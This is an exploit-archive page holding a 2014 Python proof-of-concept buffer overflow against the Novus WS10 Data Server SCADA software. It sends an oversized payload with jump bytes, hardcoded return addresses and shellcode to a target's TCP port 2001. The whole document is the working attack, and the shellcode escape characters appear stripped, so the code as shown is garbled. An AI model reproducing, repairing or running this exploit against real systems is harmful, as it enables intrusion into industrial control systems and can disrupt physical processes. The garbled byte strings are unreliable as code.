Home / exploits WS10 Data Server SCADA Overflow
Posted on 25 September 2014
## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC ## Date: 09/23/2014 ## Author: Pedro Sánchez ## Version: 1.83 (English) ## Tested on: Windows 7 embedded. ## Notified the vendor, vendor never responded. ## In the new version this PoC stops working ## Vendor: Novus ## http://www.novus.com.br ## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation import os import socket import sys ## The process listens on TCP port 2001 host = sys.argv[1] port = int(sys.argv[2]) print " PoC WS10 Data Server SCADA Exploit " print " Pedro Sanchez " shellcode = ("x33xC0x50x68x63x61x6Cx63x54x5Bx50x53xB9x44x80xc2x77xFFxD1x90x90") ## Exploit contructor ws10 = ("x90" * 1024 + "x44" * 31788) ws10 += ("xebx14") ws10 += ("x44" * 6) ws10 += ("xadxbbxc3x77") ws10 += ("xb4x73xedx77") ws10 += ("x90" * 21) ws10 += shellcode print " [+] Sending payload..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(ws10) data = s.recv(1024) print " [+] Closing..." s.close() print " [+] Done!"
